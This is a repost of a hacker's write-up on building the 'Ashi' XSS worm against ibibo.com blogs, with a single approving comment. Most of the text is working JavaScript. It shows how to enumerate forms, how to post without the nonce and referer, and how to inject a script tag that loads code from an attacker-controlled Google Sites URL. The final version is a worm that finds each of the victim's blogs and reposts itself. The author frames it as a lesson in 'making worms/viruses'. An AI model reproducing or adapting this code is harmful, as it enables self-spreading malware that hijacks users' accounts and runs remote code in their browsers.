Demystifying The Ashi virus--"vinnu"

    Ashi Virus was developed by "vinnu" bhai last year. It was a perfect example of a self-propagating virus. Let me post here his original paper. It will give us a better view on making worms/viruses and also their capabilities.

    Vulnerability:- I found several XSS vulnerabilities in ibibo.com. Next, I searched for any good point which could give me a way to automate the leveraging process. I found two php pages, post.php and new-post.php, which can submit my blog posts, and both the title as well as the content were prone to XSS. So I developed a script to find out the form elements:

    javascript:var vin=document.getElementsByTagName("form")[0];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=vin.item(iter).name+"="+vin.item(iter).value;}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;}}alert(nunnu);

    The above script retrieves the form elements and their values. So now I had the script (you have to alter the above script a little to increase the form index to a suitable value to reach the target form) as:

    javascript:var vin=document.getElementsByTagName("form")[2];var nunnu;for(var iter=0;iter<vin.length;iter++){if(iter==0){nunnu=vin.item(iter).name+"="+vin.item(iter).value;}else{nunnu+="&"+vin.item(iter).name+"="+vin.item(iter).value;}}alert(nunnu);

    Paste the above script in the address bar of the browser when the "http://blogs.ibibo.com/<your-blog>/wp-admin/" page opens. I wrote "Namaste" in the title and "Hows the life there" in the content box. It gave me the following in a dialogue box:
    post_title=Namaste&content=Hows the life there&tags_input=&action=post-quickpress-save&quickpress_post_ID=0
    &_wpnonce=3a7721d78d&_wp_http_referer=/vulnerable/wp-admin/&save=Save Draft&=Cancel&publish=Publish

    It seems like they are checking the referer (_wp_http_referer) and a nonce [_wpnonce] (well, the nonce was always the same every time I tried to post). But still, the nonce appears in a page which cannot be directly XSSed. So I just tried to post the request without the referer and nonce.

    javascript:blog();
    function blog(){
    var nunnu="><scr"+"ipt language=javascript"+" src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"<scr"+"ipt>";
    quote="Sahdi bhasa sahdi jaan hai ji, tusaan sunhsaa...";
    var blpayload="post_title="+quote;
    alert(nunnu);
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya";
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="hor&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish";
    alert(blpayload);
    ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-admin/post.php",blpayload);
    }
    function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp;
    if (window.XMLHttpRequest) {xmlhttp = new XMLHttpRequest();}
    else if (window.ActiveXObject) {
    try {xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}
    catch (e) { try {xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");} catch (e) { return;} }
    }
    alert("sending");
    xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);
    alert("sent");
    }
    alert("done");

    It worked and it posted the blog even without the nonce and referer defined in the querystring. But there is a problem.
    The script is appearing in the heading, and I also wanted the script to post a different topic every time it gets executed, so I introduced the following well-known circuit for choosing one of the strings out of a list:

    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a language...";
    var blpayload="post_title="+quote[no];

    After assembling it with the above script I got the following code:

    javascript:blog();
    function blog(){
    var nunnu="><scr"+"ipt language=javascript"+" src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a language...";
    var blpayload="post_title="+quote[no];
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya</p></div";
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="hor&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish";
    alert(blpayload);
    ajaxPSLV("http://blogs.ibibo.com/vulnerable/wp-admin/post.php",blpayload);
    } function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp; if (window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
    try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
    try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
    return;}}}alert("sending");xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);alert("sent");
    }alert("done");

    But I don't want my worm to just post in a hardcoded blog. It must search for all the blogs of the user and inject the posts as the above post did. To do this I have to check the hrefs of all the anchors, because the blog names appear within the page, and when we click on any one, the respective blog changes.

    javascript:var vin=document.getElementsByTagName("a");var nunn="";for(var i=0;i<vin.length;i++){nunn+=vin[i].href+"\n";}alert(nunn);

    But there are also several other items along with the blogs. So my virus must identify the blogs out of the other objects.
    I checked the pattern. After a careful inspection, I found that the hrefs which have wp-admin in them are the references to the blogs of the user. So I developed another script to check it:

    javascript:test();
    function test() {
    var list="";
    var vin=document.getElementsByTagName("a");
    var total=0;var index=0;var address;
    var intex=0;
    for(var iter=0;iter<vin.length;iter++){
    if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
    address=vin[iter].href.substring(0,index+8)+"/post.php";
    list += address+"\n";intex++;
    }}alert(intex+"\n"+list);}

    Now I have got a way to identify the blogs out of the other objects and post the random topics. By combining all of these, a beast started to take shape as:

    javascript:trigger();
    function trigger() {
    var vin=document.getElementsByTagName("a");
    var total=0;var index=0;var address;
    for(var iter=0;iter<vin.length;iter++){
    if((index=vin[iter].href.indexOf("wp-admin"))!=-1){
    address=vin[iter].href.substring(0,index+8)+"/post.php";
    blog(address);
    }}}
    function blog(addr){
    var nunnu="><scr"+"ipt language=javascript"+" src='http://sites.google.com/site/urcontrolledsite/ibibo.js'>"+"</scr"+"ipt><a href=\"\" onmouseover=javascript:blog();>Jaijeya</a><a ";
    var no=Math.floor(Math.random()*10);
    var quote=new Array(10);
    quote[0]="Sahdi bhasa sahdi jaan...";
    quote[1]="Don't you think we can...";
    quote[2]="Thats the attitude...Keep it up.";
    quote[3]="Intelligent?..";
    quote[4]="Main koi machine thodi hai...";
    quote[5]="Jaijeya ji! Theek hainn na?...";
    quote[6]="Veero! Tusaan Eh bhi parhi leya";
    quote[7]="Himachal a heaven...";
    quote[8]="Free Tibet...";
    quote[9]="Pahari (Kangri) dialoge must be respected and registered as a language...";
    var blpayload="post_title="+quote[no];
    blpayload+=encodeURIComponent(nunnu);
    blpayload+="&content=Jaijeya</p></div";
    blpayload+=encodeURIComponent("><"+"sc"+"ript language=javascript>var ashi='"+nunnu+"';eval(ashi);<"+"/sc"+"ript>");
    blpayload+="hor&tags_input=&action=post-quickpress-save&quickpress_post_ID=0&_wpnonce=&_wp_http_referer=&save=Save%20Draft&=Cancel&publish=Publish";
    alert(blpayload); ajaxPSLV(addr,blpayload);
    }
    function ajaxPSLV(url, payload) {
    alert("url:\t"+url+"\npayload:\n"+payload);
    var xmlhttp; if (window.XMLHttpRequest){
    xmlhttp = new XMLHttpRequest();} else if (window.ActiveXObject){
    try{xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");}catch(e){
    try{xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");}catch(e){
    return;}}}alert("sending");xmlhttp.open("POST", url, true);
    xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
    xmlhttp.setRequestHeader("Content-length", payload.length);
    alert("sending:\t"+payload.length);
    xmlhttp.send(payload);alert("sent");
    };

    But I thought the title was not a good place to inject the code, as it will appear in the dashboard. So I placed the code in the argument of post.php named "content" instead of "post_title". The variable "nunnu" contains the code for a script which retrieves the remote JavaScript file at:
    http://sites.google.com/site/urcontrolledsite/ibibo.js
    This article was originally published in blog: Demystifying The Ashi virus--"vinnu" started by prashant_uniyal
    Comments (1)

    soul301: great.. awesome work.. nice, and hats off to you guys